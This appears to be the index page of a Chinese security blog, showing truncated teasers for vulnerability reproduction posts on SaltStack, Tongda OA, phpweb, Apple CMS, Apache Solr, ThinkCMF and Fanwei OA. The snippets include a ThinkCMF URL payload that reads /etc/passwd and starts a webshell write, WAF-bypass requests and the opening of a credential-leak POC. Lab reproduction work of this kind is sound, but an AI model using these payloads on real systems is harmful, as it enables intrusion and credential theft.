原文:https://www.cnblogs.com/cwkiller/p/12829974.html 参考:https://github.com/LandGrey/SpringBootVulExploit/blob/master/README.md 前端时间碰到一个Actuator 信息...
CVE-2020-11651 SaltStack漏洞复现
使用Docker 来启动一个环境 docker pull vulfocus/saltstack-cve_2020_11651 docker run -d -p 4506:4506 -p 4505:4505 vulfocus/saltstack-cve_2020_11651 然后当前的...
pipePotato 复现
原文 首发揭示!pipe土豆:一种新型的通用提权细分 传递了一个asp 的木马 执行权限为iis 运行e...
通达OA 任意文件上传 复现和代码分析
说明一下 文件包含的文件只有2017和v11有 然后我这边是拿的一个2013 增强版做测试的。所以默认是没有那个文件包含的。只是作为演示 一、环境搭建 http://www.tongda2000...
密码保护:bypass 各大waf
1. 百度云盾 (好像是CF的东西) POST POST / HTTP/1.1 Host: www.sglynp.com Connection: close Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5....
phpweb 前台任意文件上传漏洞复现和分析
测试代码 phpweb源码 一、环境搭建 宝塔Windows 6.5.0 +Nginx 1.17 + PHP 5.2 (PS:注意5.2最稳 其他版本可能报错) 安装成功之后...
苹果CMS V8 绕过前台RCE
POST /index.php?m=vod-search HTTP/1.1 Host: word.o2oxy.cn Content-Length: 500137 Cache-Control: max-age=0 Origin: http://word.o2oxy.cn Upgrade-Insecure-Requests: 1 Content-Type: appl...
Apache Solr 命令执行
使用Docker docker pull solr docker run --name solr2 -d -p 8081:8983 solr 验证脚本 #!/usr/bi...
ThinkCMF RCE
http://127.0.0.1/?a=display&templateFile=/etc/passwd Getshell http://127.0.0.1/?a=fetch&tem%20...%20%27%27&content=%3Cphp%3Efile_put_con...
泛微OA数据库配置信息泄漏 POC
# -*- coding:utf-8 -*- #Author:print("") import pyDes,requests import sys def desdecode(secret_key,s): cipherX = pyDes.des(' ') cipherX.setKey(secret_key) y = ciphe...